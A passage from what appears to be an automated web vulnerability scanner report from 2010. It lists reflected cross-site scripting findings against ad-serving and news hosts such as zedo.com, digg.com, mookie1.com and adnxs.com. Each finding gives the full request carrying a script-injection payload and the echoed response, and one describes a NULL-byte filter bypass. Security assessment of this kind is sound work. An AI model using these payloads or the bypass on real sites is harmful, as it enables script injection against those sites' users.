2.50. http://c7.zedo.com/jsc/c5/fl.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/jsc/c5/fl.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da82d'-alert(1)-'ab93caaea63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsc/c5/fl.js?da82d'-alert(1)-'ab93caaea63=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=kPqaFwoBADQAAAvtu9YAAABJ~110710; FFgeo=8925100; ZCBC=1; ZEDOIDX=29; FFChanCap=1406B1025,23#804861,1#775786#834321#775734#835850#567988#775797#834300#835844#775730#567997#775796,2#835848#702922#835860#711358#569033:951,7#606844,2#776116,11#538792:1083,20#647857#647876,19#740733|0,1,1:0,1,1:0,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,2,1:1,2,1:0,1,1:1,7,1:0,7,1:0,13,7; ZFFbh=826-20101107,20|305_1; ZFFAbh=677B826,20|583_678#366Z305_1#365; FFCap=1406B933,151716:951,125045,131022,131021|0,2,1:0,1,1:4,1,1:0,1,1; __qca=P0-1260470253-1289175784459;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 771
Content-Type: application/x-javascript
ETag: "a361e2-4429-48e2858f30440"
X-Varnish: 1843437411 1843436570
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=248
Expires: Tue, 23 Nov 2010 00:08:18 GMT
Date: Tue, 23 Nov 2010 00:04:10 GMT
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

w0.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=lar/v10-003/c7;referrer='+document.referrer+';tag=c7.zedo.com/jsc/c5/fl.js;qs=da82d'-alert(1)-'ab93caaea63=1;';

var zzStr="q=;z="+Math.random();var zzSection=0;var zzPat='';

var zzhasAd;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = new Date(); zzd.setDate(zz
...[SNIP]...

2.51. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/lar/v10-003/c7/jsc/flr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fd8a'-alert(1)-'6e0319137ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /lar/v10-003/c7/jsc/flr.js?5fd8a'-alert(1)-'6e0319137ee=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=kPqaFwoBADQAAAvtu9YAAABJ~110710; FFgeo=8925100; ZCBC=1; ZEDOIDX=29; FFChanCap=1406B1025,23#804861,1#775786#834321#775734#835850#567988#775797#834300#835844#775730#567997#775796,2#835848#702922#835860#711358#569033:951,7#606844,2#776116,11#538792:1083,20#647857#647876,19#740733|0,1,1:0,1,1:0,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,2,1:1,2,1:0,1,1:1,7,1:0,7,1:0,13,7; ZFFbh=826-20101107,20|305_1; ZFFAbh=677B826,20|583_678#366Z305_1#365; FFCap=1406B933,151716:951,125045,131022,131021|0,2,1:0,1,1:4,1,1:0,1,1; __qca=P0-1260470253-1289175784459;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 784
Content-Type: application/x-javascript
ETag: "898b0b78-4239-48e2858f30440"
X-Varnish: 1843421748
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=248
Date: Tue, 23 Nov 2010 00:04:10 GMT
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

w0.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=lar/v10-003/c7;referrer='+document.referrer+';tag=c7.zedo.com/lar/v10-003/c7/jsc/flr.js;qs=5fd8a'-alert(1)-'6e0319137ee=1;';

var zzStr="q=;z="+Math.random();var zzSection=0;var zzPat='';

var zzhasAd;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = new Date(); zzd.setDate(zz
...[SNIP]...

2.52. http://digg.com/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e87a3"><script>alert(1)</script>b059f6fea37 was submitted in the REST URL parameter 1. This input was echoed as e87a3"><script>alert(1)</script>b059f6fea37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00e87a3"><script>alert(1)</script>b059f6fea37 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:03:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2233503940199055809%3A136; expires=Thu, 23-Dec-2010 00:03:02 GMT; path=/; domain=digg.com
Set-Cookie: d=554eda0704758d96d1ee0dac0bb348417b9e2593c4687b30b1115e2f3ebffcce; expires=Sun, 22-Nov-2020 10:10:42 GMT; path=/; domain=.digg.com
X-Digg-Time: D=211018 10.2.129.226
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15330

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00e87a3"><script>alert(1)</script>b059f6fea37.rss">
...[SNIP]...

2.53. http://dm.de.mookie1.com/2/B3DM/2010DM/1692524740@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1692524740@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed05"><script>alert(1)</script>a5a151b9188 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM5ed05"><script>alert(1)</script>a5a151b9188/2010DM/1692524740@x23 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; session=1290469841|1290469857; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; OAX=rnoX2ky07x0ACKAn;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:02:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM5ed05"><script>alert(1)</script>a5a151b9188/2010DM/250862160/x23/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><I
...[SNIP]...

2.54. http://dm.de.mookie1.com/2/B3DM/2010DM/1692524740@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1692524740@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ffb7"><script>alert(1)</script>c666e82e4a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM4ffb7"><script>alert(1)</script>c666e82e4a5/1692524740@x23 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; session=1290469841|1290469857; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; OAX=rnoX2ky07x0ACKAn;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:02:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM4ffb7"><script>alert(1)</script>c666e82e4a5/380558663/x23/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><I
...[SNIP]...

2.55. http://dm.de.mookie1.com/2/B3DM/2010DM/1692524740@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1692524740@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f804a"><script>alert(1)</script>37d2bea4fc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1692524740@x23f804a"><script>alert(1)</script>37d2bea4fc HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; session=1290469841|1290469857; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; OAX=rnoX2ky07x0ACKAn;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:02:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/114984715/x23f804a"><script>alert(1)</script>37d2bea4fc/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><IM
...[SNIP]...

2.56. http://dm.de.mookie1.com/2/B3DM/2010DM/1692524740@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1692524740@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56ffb"-alert(1)-"288581b2140 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1692524740@x23?56ffb"-alert(1)-"288581b2140=1 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; session=1290469841|1290469857; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; OAX=rnoX2ky07x0ACKAn;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:02:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 564
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<script>
var camp="56ffb"-alert(1)-"288581b2140=1";

camp=camp.toUpperCase();

function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e)
...[SNIP]...

2.57. http://dm.de.mookie1.com/2/B3DM/DLX/1654173699@x95 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/1654173699@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c745e"><script>alert(1)</script>0538ea307b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMc745e"><script>alert(1)</script>0538ea307b9/DLX/1654173699@x95 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; session=1290469841|1290469857; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; OAX=rnoX2ky07x0ACKAn;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:02:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMc745e"><script>alert(1)</script>0538ea307b9/DLX/1855470213/x95/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><IMG
...[SNIP]...

2.58. http://dm.de.mookie1.com/2/B3DM/DLX/1654173699@x95 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/1654173699@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfe1c"><script>alert(1)</script>5209608b56d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLXdfe1c"><script>alert(1)</script>5209608b56d/1654173699@x95 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; session=1290469841|1290469857; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; OAX=rnoX2ky07x0ACKAn;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:02:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLXdfe1c"><script>alert(1)</script>5209608b56d/813050418/x95/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><IMG
...[SNIP]...

2.59. http://dm.de.mookie1.com/2/B3DM/DLX/1654173699@x95 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/1654173699@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bd0"><script>alert(1)</script>c7804a16979 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1654173699@x9544bd0"><script>alert(1)</script>c7804a16979 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; session=1290469841|1290469857; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; OAX=rnoX2ky07x0ACKAn;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:02:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/2082032071/x9544bd0"><script>alert(1)</script>c7804a16979/default/empty.gif/726e6f58326b793037783041434b416e?x" target="_top"><IMG
...[SNIP]...

2.60. http://dm.de.mookie1.com/2/B3DM/DLX/1654173699@x95 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/1654173699@x95

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e310'-alert(1)-'e128de66ab6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/DLX/1654173699@x95?1e310'-alert(1)-'e128de66ab6=1 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=1618482233066729; session=1290469841|1290469857; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; OAX=rnoX2ky07x0ACKAn;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:02:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3523
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var dlx_segment_list = '1e310'-alert(1)-'e128de66ab6=1';

var dlx_segment_list_pairs=dlx_segment_list.split('|');
var ZAP_url='http://t.mookie1.com/t/v1/event?migClientId=1214&migAction=';

var ZT_string='';

var dlx_segment='';

//build string
...[SNIP]...

2.61. http://ib.adnxs.com/ab [cnd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dd98'-alert(1)-'c7de81f4ba5 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=NpTX0FBeA0AAAABgZmYCQAAAAGBmZgJAzczMjGZmAkAAAAAAUV4DQFU2vxGKBOQgfxe8qqcfxE52-OpMAAAAAK7tAADLAQAAagEAAAIAAABb-gEAAQAAAFVTRABVU0QALAH6AKAGiQM2BQECBQIEAAAAAAA6HX06&tt_code=vert-15&udj=uf%28%27a%27%2C+5442%2C+1290467446%29%3Buf%28%27c%27%2C+32297%2C+1290467446%29%3Buf%28%27r%27%2C+129627%2C+1290467446%29%3Bppv%286116%2C+%272370024294953465429%27%2C+1290467446%2C+1290553846%2C+32297%2C+551%29%3B&cnd=!vSoCsAip_AEQ2_QHGN8EIKcEKIkHMTaU19BQXgNAQhMIABAAGAAgASj-__________8BQhQI5C8QABgAIAMo_v__________AUIUCOQvEAAYACACKP7__________wFIAFAAWKAN2dd98'-alert(1)-'c7de81f4ba5&referrer=http://www.smh.com.au&pp=DDB36993D7817E36 HTTP/1.1
Accept: */*
Referer: http://ad-apac.doubleclick.net/adi/onl.smh.news/news/homepage;cat1=homepage;cat=news;ctype=index;pos=2;sz=300x250;tile=8;ord=96026626?
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ib.adnxs.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: sess=1; anj=Kfu=8fG3x=E:3F.0s]#%2L_'x%SEV/i#-pc=G#<hF[085K80?=O$KqY+(W^sKvh:SKd8e:HDCurJCPLQBXnZ9d'?)K3sioph.s=s((NS'@%9_V3:tjxoAg.6sF[JLjIdkWe5:3'3PU%4UXg_8gT!dKqx[BbcKHJ6D3g1GQ/=$ajGg9AZal%>*Hjj`TZJ@YC0AEbC+t+[adDw@>)>AN?$aCK%p05)$pe.]*wBDTulo^l%yp1_g?Jo/G#T-ukLV>#!0fjkO+gqS; uuid2=5675696235378120575

Response

2.62. http://ib.adnxs.com/ab [referrer parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc163'-alert(1)-'2df3cc65ec was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=NpTX0FBeA0AAAABgZmYCQAAAAGBmZgJAzczMjGZmAkAAAAAAUV4DQFU2vxGKBOQgfxe8qqcfxE52-OpMAAAAAK7tAADLAQAAagEAAAIAAABb-gEAAQAAAFVTRABVU0QALAH6AKAGiQM2BQECBQIEAAAAAAA6HX06&tt_code=vert-15&udj=uf%28%27a%27%2C+5442%2C+1290467446%29%3Buf%28%27c%27%2C+32297%2C+1290467446%29%3Buf%28%27r%27%2C+129627%2C+1290467446%29%3Bppv%286116%2C+%272370024294953465429%27%2C+1290467446%2C+1290553846%2C+32297%2C+551%29%3B&cnd=!vSoCsAip_AEQ2_QHGN8EIKcEKIkHMTaU19BQXgNAQhMIABAAGAAgASj-__________8BQhQI5C8QABgAIAMo_v__________AUIUCOQvEAAYACACKP7__________wFIAFAAWKAN&referrer=http://www.smh.com.aucc163'-alert(1)-'2df3cc65ec&pp=DDB36993D7817E36 HTTP/1.1
Accept: */*
Referer: http://ad-apac.doubleclick.net/adi/onl.smh.news/news/homepage;cat1=homepage;cat=news;ctype=index;pos=2;sz=300x250;tile=8;ord=96026626?
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ib.adnxs.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: sess=1; anj=Kfu=8fG3x=E:3F.0s]#%2L_'x%SEV/i#-pc=G#<hF[085K80?=O$KqY+(W^sKvh:SKd8e:HDCurJCPLQBXnZ9d'?)K3sioph.s=s((NS'@%9_V3:tjxoAg.6sF[JLjIdkWe5:3'3PU%4UXg_8gT!dKqx[BbcKHJ6D3g1GQ/=$ajGg9AZal%>*Hjj`TZJ@YC0AEbC+t+[adDw@>)>AN?$aCK%p05)$pe.]*wBDTulo^l%yp1_g?Jo/G#T-ukLV>#!0fjkO+gqS; uuid2=5675696235378120575

Response

2.63. http://ib.adnxs.com/ab [tt_code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e727'-alert(1)-'097ac880a31 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=NpTX0FBeA0AAAABgZmYCQAAAAGBmZgJAzczMjGZmAkAAAAAAUV4DQFU2vxGKBOQgfxe8qqcfxE52-OpMAAAAAK7tAADLAQAAagEAAAIAAABb-gEAAQAAAFVTRABVU0QALAH6AKAGiQM2BQECBQIEAAAAAAA6HX06&tt_code=vert-158e727'-alert(1)-'097ac880a31&udj=uf%28%27a%27%2C+5442%2C+1290467446%29%3Buf%28%27c%27%2C+32297%2C+1290467446%29%3Buf%28%27r%27%2C+129627%2C+1290467446%29%3Bppv%286116%2C+%272370024294953465429%27%2C+1290467446%2C+1290553846%2C+32297%2C+551%29%3B&cnd=!vSoCsAip_AEQ2_QHGN8EIKcEKIkHMTaU19BQXgNAQhMIABAAGAAgASj-__________8BQhQI5C8QABgAIAMo_v__________AUIUCOQvEAAYACACKP7__________wFIAFAAWKAN&referrer=http://www.smh.com.au&pp=DDB36993D7817E36 HTTP/1.1
Accept: */*
Referer: http://ad-apac.doubleclick.net/adi/onl.smh.news/news/homepage;cat1=homepage;cat=news;ctype=index;pos=2;sz=300x250;tile=8;ord=96026626?
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ib.adnxs.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: sess=1; anj=Kfu=8fG3x=E:3F.0s]#%2L_'x%SEV/i#-pc=G#<hF[085K80?=O$KqY+(W^sKvh:SKd8e:HDCurJCPLQBXnZ9d'?)K3sioph.s=s((NS'@%9_V3:tjxoAg.6sF[JLjIdkWe5:3'3PU%4UXg_8gT!dKqx[BbcKHJ6D3g1GQ/=$ajGg9AZal%>*Hjj`TZJ@YC0AEbC+t+[adDw@>)>AN?$aCK%p05)$pe.]*wBDTulo^l%yp1_g?Jo/G#T-ukLV>#!0fjkO+gqS; uuid2=5675696235378120575

Response

2.64. http://ib.adnxs.com/if [cnd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/if

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c1f'-alert(1)-'5aa21f25075 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /if?enc=sQPYZfUU9j9O0CaHT_r0PwAAAGBmZgJAzczMjGZmAkAAAAAAUV4DQFU2vxGKBOQgfxe8qqcfxE52-OpMAAAAAK7tAADLAQAAagEAAAIAAABb-gEAAQAAAFVTRABVU0QALAH6AKAGiQM2BQECBQIEAAAAAADgINnK&tt_code=vert-15&udj=uf%28%27a%27%2C+5442%2C+1290467446%29%3Buf%28%27c%27%2C+32297%2C+1290467446%29%3Buf%28%27r%27%2C+129627%2C+1290467446%29%3Bppv%286116%2C+%272370024294953465429%27%2C+1290467446%2C+1290553846%2C+32297%2C+551%29%3B&cnd=!vSoCsAip_AEQ2_QHGN8EIKcEKIkHMTaU19BQXgNAQhMIABAAGAAgASj-__________8BQhQI5C8QABgAIAMo_v__________AUIUCOQvEAAYACACKP7__________wFIAFAAWKAN55c1f'-alert(1)-'5aa21f25075&referrer=http://www.smh.com.au HTTP/1.1
